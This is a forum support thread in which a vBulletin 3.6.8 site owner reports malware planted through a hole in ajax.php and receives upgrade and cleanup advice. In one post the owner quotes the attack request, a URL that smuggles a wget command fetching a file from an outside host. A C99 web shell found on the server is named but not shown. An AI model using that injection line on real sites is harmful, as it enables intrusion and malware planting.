Announcement

Collapse
No announcement yet.

Questions regarding security/malware

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Questions regarding security/malware

    I'm running vb 3.6.8 (amongst 2 other versions on other site). Recently I've had BAD problems with malware being installed through what seems to be ajax.php

    What is the latest version of vBulletin?

    It seems the more I search into malware + vBulletin, the further one goes up in versions, the even MORE malware susceptible vB becomes! The more I research, it seems vB 4 is full of exploits. usually it's blamed on 3rd party plugins, but the last post I read, the guy was running stock vB and still got infected.

    Question: What is the latest version of vB, and has ANYONE suffered an exploit attack on it?

    I'm looking for a version I just do NOT have to worry about waking up to and see that google has flagged my site as an Attack Site! in the big box.

  • #2
    4.2.0 PL2 is the latest version. It's not always vB that has an exploit, often times, it's a misconfigured server, or a plugin.



    Dustin
    http://quikmsg.net/strtoupper/ - Convert lowercase text and code to all uppercase!
    http://quikmsg.net/strtolower/ - Convert uppercase text and code to all lowercase!

    Comment


    • #3
      Originally posted by Dustin L. View Post
      4.2.0 PL2 is the latest version. It's not always vB that has an exploit, often times, it's a misconfigured server, or a plugin.



      Dustin
      I'm just scared I'll upgrade and run into exactly the same problem I'm having right now. On a huge server with hundreds of gigabytes of files and over a MILLION files, it's absolutely sickening (physically sick to my stomach) to wake up and check the site and see the big google warning ATTACK SITE! box for Firefox users, and not know what's happened or what's been changed, etc. And the worst part is, I haven't eaten in days because this is worrying me 24/7. I can't sleep, I can't eat, my hands and fingers are ALWAYS sweating. It's having an enormous emotional and physical impact on me knowing my site is being broken in to.

      Comment


      • #4
        If you're having health issues because you're scared of people getting into your site, you might want to see a doctor.

        Then, read these:

        https://www.vbulletin.com/forum/cont...vBulletin-Site
        https://www.vbulletin.com/forum/entr...s-%28Part-1%29
        https://www.vbulletin.com/forum/entr...s-%28Part-2%29



        Dustin
        http://quikmsg.net/strtoupper/ - Convert lowercase text and code to all uppercase!
        http://quikmsg.net/strtolower/ - Convert uppercase text and code to all lowercase!

        Comment


        • #5
          Thanks Dustin L.

          SPECIFICALLY: I need a version of at least the ajax.php file that is compatible with 3.6.8 -- right now I have a 4.x version that DOES patch the security hole, but unfortunately does not let users register.

          I really need a patched ajax.php file. The old 3.6.8 ajax.php allowed people to put files onto my site like this:
          Code:
          http://forum.mydomain.com/ajax.php?global=wget%20http://www.whatever.com/images/logo2.png
          Code:
          Database error in vBulletin 3.6.8:
          
          
          Invalid SQL:
          
          
                                                  SELECT languageid,
                                  phrasegroup_posting AS phrasegroup_posting,
                                  phrasegroup_search AS phrasegroup_search,
                                  phrasegroup_socialgroups AS phrasegroup_socialgroups,
                                  phrasegroup_global AS phrasegroup_global,
                                  options AS lang_options,
                                  languagecode AS lang_code,
                                  charset AS lang_charset,
                                  locale AS lang_locale,
                                  imagesoverride AS lang_imagesoverride,
                                  dateoverride AS lang_dateoverride,
                                  timeoverride AS lang_timeoverride,
                                  registereddateoverride AS lang_registereddateoverride,
                                  calformat1override AS lang_calformat1override,
                                  calformat2override AS lang_calformat2override,
                                  logdateoverride AS lang_logdateoverride,
                                  decimalsep AS lang_decimalsep,
                                  thousandsep AS lang_thousandsep
                                                  FROM language
                                                  WHERE languageid = 1;
          
          
          MySQL Error  : Unknown column 'phrasegroup_socialgroups' in 'field list'
          Error Number : 1054
          Date         : Thursday, July 19th 2012 @ 03:34:25 AM
          Script       : http://forum.mydomain.com/ajax.php?do=imagereg&imagehash=95fb5293802fe6f57d2923e692673ea9
          Referrer     : http://forum.mydomain.com/register.php?do=register
          IP Address   : 1.38.16.7
          Username     : 
          Classname    : vB_Database

          Comment


          • #6
            The db error you posted it comes from the column 'phrasegroup_socialgroups' which seems to be missing. If you are reluctant to upgrade your forum to 4.2.0 pl2 then upgrade your forum to at least the latest version of the 3.8x series. That would take care to fix the security issues.

            Personally I would advice you, if I may, to upgrade to 4.2.0 pl2. It has no known security issue and it has a lot of great options and features. Also make a thorough search of your server space for any backdoor scripts that may have been left behind and also contact your host and ask them to check their access logs to see hoe exactly your forum was hacked.

            Comment


            • #7
              I take the last msg back! It looks like new user registrations ARE working - all those errors came from the SAME IP ADDRESSES! I got about 9 registration errors but ONLY from these 2 IPs! Hacker!!??

              IP Address : 1.38.16.5

              and

              IP Address : 1.38.16.7


              ----

              I checked the user base and there HAVE been successful new registrations today. (ips way different from the one above) All my 9 vBulletin Databaser Error msgs were like the one I posted above, and ALL from those 2 IP addresses. So maybe it was an attempt to exploit the registration process.

              Comment


              • #8
                3.8.7 or 4.2.0 are the two latest versions.

                Neither have any known security issues.

                If you have a site that uses modifications or custom styles, then for the time being upgrade to 3.8.7.

                But it is possible it's a server exploit, in which case upgrading will not help.

                Don't try to use files from later versions in 3.6.8. It will only cause problems and even potentially data loss.
                MARK.B | vBULLETIN SUPPORT

                TalkNewsUK - My vBulletin 5.6.0 Demo
                AdminAmmo - My Cloud Demo

                Comment


                • #9
                  Those ip's come from India. Most probably spammers.

                  Comment


                  • #10
                    Originally posted by borbole View Post
                    The db error you posted it comes from the column 'phrasegroup_socialgroups' which seems to be missing. If you are reluctant to upgrade your forum to 4.2.0 pl2 then upgrade your forum to at least the latest version of the 3.8x series. That would take care to fix the security issues.

                    Personally I would advice you, if I may, to upgrade to 4.2.0 pl2. It has no known security issue and it has a lot of great options and features. Also make a thorough search of your server space for any backdoor scripts that may have been left behind and also contact your host and ask them to check their access logs to see hoe exactly your forum was hacked.
                    Actually I have the guys at Total Server Solutions on the problem and they've been on it for a few days now, upgrading/patching Plesk, php/mysql/apache, they've run scanners, grepped for iframes, that '64' (?) encoded stuff, etc. It wasn't until last night that they found an __error.php file that was the !C99madShell v. 2.0 madnet edition! hack program thing, and they managed to determine that my ajax.php file (3.6.8) had a major security hole in it that allowed intruders to put files onto my server. So as a quick fix I found an open source ajax 4.x file and tried it simply because that was the only option we could think of, they tried the same exploit on it, and the exploit failed. So I *SEEM* to be 'safe' right now, as there was no malware put on overnight, but that's not a large time frame, so time will tell. But obviously using the wrong version ajax.php with my version of vB isn't the right way to do things. But it's better than having malware slapped all over, and waking up to big red boxes saying "Warning: Attack Site!" when I try to access my site.

                    What I REALLY need right now is a fully patched ajax.php for 3.6.8 until my coder can make my forum ready for upgrade. I will buy 4.x if 3.6.8 can be upgraded to it. But due to the large amount of custom work on my forum by somewhat amateur people in the past, my current coder needs to re-do their work so the plugins work as hooks instead of manually editing vB php code (the latter of course, would all be overwritten and lost during an upgrade)

                    - - - Updated - - -

                    Originally posted by Mark.B View Post
                    3.8.7 or 4.2.0 are the two latest versions.

                    Neither have any known security issues.

                    If you have a site that uses modifications or custom styles, then for the time being upgrade to 3.8.7.

                    But it is possible it's a server exploit, in which case upgrading will not help.

                    Don't try to use files from later versions in 3.6.8. It will only cause problems and even potentially data loss.
                    So 3.8.7 then. ok. I'll see if I can get my coder to make proper hook plugins for the sloppy custom work that was done before he started working with me, and get him to upgrade for me. THANK YOU on stating what version I need to get to, because I have no idea about vB version numbers.

                    Comment


                    • #11
                      Originally posted by z0diac

                      Actually I have the guys at Total Server Solutions on the problem and they've been on it for a few days now, upgrading/patching Plesk, php/mysql/apache, they've run scanners, grepped for iframes, that '64' (?) encoded stuff, etc. It wasn't until last night that they found an __error.php file that was the !C99madShell v. 2.0 madnet edition! hack program thing, and they managed to determine that my ajax.php file (3.6.8) had a major security hole in it that allowed intruders to put files onto my server. So as a quick fix I found an open source ajax 4.x file and tried it simply because that was the only option we could think of, they tried the same exploit on it, and the exploit failed. So I *SEEM* to be 'safe' right now, as there was no malware put on overnight, but that's not a large time frame, so time will tell. But obviously using the wrong version ajax.php with my version of vB isn't the right way to do things. But it's better than having malware slapped all over, and waking up to big red boxes saying "Warning: Attack Site!" when I try to access my site.

                      What I REALLY need right now is a fully patched ajax.php for 3.6.8 until my coder can make my forum ready for upgrade. I will buy 4.x if 3.6.8 can be upgraded to it. But due to the large amount of custom work on my forum by somewhat amateur people in the past, my current coder needs to re-do their work so the plugins work as hooks instead of manually editing vB php code (the latter of course, would all be overwritten and lost during an upgrade)
                      There is not going to be a patched version of any 3.6.8 files. Your best bet I think is to upgrade to 3.8.7.
                      MARK.B | vBULLETIN SUPPORT

                      TalkNewsUK - My vBulletin 5.6.0 Demo
                      AdminAmmo - My Cloud Demo

                      Comment


                      • #12
                        With the help of my coder, we've decided to go ahead and upgrade. I just have to pay him goobs of dollars first to write proper plugins for the ones I got amateurs to do when I first started. Then set up the new version side by side, but offline, make sure all the plugins and modifications work, and go from there.

                        But so far this 4.x ajax.php script seems to be holding everything down ok. Knock on wood... i'm about to go to sleep and with my luck I'll wake up to the big Google red box of death.

                        Comment

                        widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                        Working...
                        X